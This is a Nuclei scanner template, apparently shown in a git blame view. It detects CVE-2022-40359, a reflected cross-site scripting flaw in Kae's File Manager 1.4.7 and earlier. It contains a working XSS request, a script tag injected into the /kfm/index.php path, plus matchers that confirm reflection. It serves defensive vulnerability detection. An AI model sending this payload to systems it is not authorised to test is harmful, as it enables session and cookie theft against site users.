nuclei-templates/cves/2022/CVE-2022-40359.yaml

48 lines
1.4 KiB
YAML
Raw Normal View History

2022-10-04 12:58:20 +00:00
id: CVE-2022-40359
info:
name: Kae's File Manager <=1.4.7 - Cross-Site Scripting
2022-10-04 17:05:30 +00:00
author: edoardottt,daffainfo
2022-10-04 12:58:20 +00:00
severity: medium
description: |
Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
2022-10-04 12:58:20 +00:00
reference:
- https://cxsecurity.com/issue/WLB-2022090057
- https://code.google.com/archive/p/kfm/downloads
- https://nvd.nist.gov/vuln/detail/CVE-2022-40359
2022-10-04 12:58:20 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-10-04 12:58:20 +00:00
cve-id: CVE-2022-40359
cwe-id: CWE-79
2022-11-11 10:12:39 +00:00
metadata:
verified: "true"
2022-11-11 10:12:39 +00:00
tags: cve,cve2022,xss,kfm
2022-10-04 12:58:20 +00:00
requests:
- raw:
- |
2022-10-04 17:05:30 +00:00
GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1
2022-10-04 12:58:20 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-10-04 17:05:30 +00:00
- "<script>alert(document.domain);</script>"
- "x_kfm_changeCaption"
- "kfm_copyFiles"
2022-11-11 10:12:39 +00:00
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by md on 2022/12/13